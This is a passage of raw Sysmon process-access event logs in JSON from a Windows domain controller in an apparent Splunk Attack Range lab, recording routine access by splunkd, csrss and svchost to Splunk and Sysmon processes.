{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-00100E6C0F00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-00100E6C0F00}","TargetProcessId":"4836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-00100E6C0F00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-00100E6C0F00}","TargetProcessId":"4836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 